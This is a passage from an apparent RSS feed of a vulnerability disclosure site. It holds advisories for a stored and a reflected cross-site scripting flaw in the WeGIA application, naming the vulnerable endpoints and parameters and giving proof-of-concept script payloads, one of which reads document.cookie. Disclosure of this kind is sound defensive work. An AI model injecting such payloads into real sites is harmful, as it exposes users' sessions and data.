    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23033</title>
        <link>https://www.cvehunters.com/p/cve-2025-23033/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23033/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23033-cross-site-scripting-xss-stored-endpoint-adicionar_situacaophp-parameter-situacao&amp;#34;&amp;gt;CVE-2025-23033: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_situacao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;situacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23033&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23033&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_situacao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;situacao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_situacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23033-cross-site-scripting-xss-stored-endpoint-adicionar_situacaophp-parameter-situacao&amp;#34;&amp;gt;CVE-2025-23033: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_situacao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;situacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23033&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23033&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_situacao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;situacao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_situacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;situacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_situacao.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;13&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793.png&amp;#34;
	width=&amp;#34;819&amp;#34;
	height=&amp;#34;341&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793_hu_299abfdd04f1934.png 480w, /p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793_hu_fd6e0c0927bcc7d1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;240&amp;#34;
		data-flex-basis=&amp;#34;576px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94.png&amp;#34;
	width=&amp;#34;807&amp;#34;
	height=&amp;#34;171&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94_hu_4d32d4b4f2da151a.png 480w, /p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94_hu_71f40838a3a0f4be.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;471&amp;#34;
		data-flex-basis=&amp;#34;1132px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r8fq-hqr2-v5j9code&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r8fq-hqr2-v5j9code&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23034</title>
        <link>https://www.cvehunters.com/p/cve-2025-23034/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23034/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23034-cross-site-scripting-xss-reflected-endpoint-tagsphp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-23034: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;tags.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230334&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230334&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;tags.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/socio/sistema/tags.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23034-cross-site-scripting-xss-reflected-endpoint-tagsphp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-23034: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;tags.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230334&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230334&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;tags.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/socio/sistema/tags.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39.png&amp;#34;
	width=&amp;#34;804&amp;#34;
	height=&amp;#34;221&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39_hu_6ca3bfaac8361e0f.png 480w, /p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39_hu_82ba27ad6ee90b18.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;363&amp;#34;
		data-flex-basis=&amp;#34;873px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v68m-2rvf-8r25&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v68m-2rvf-8r25&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
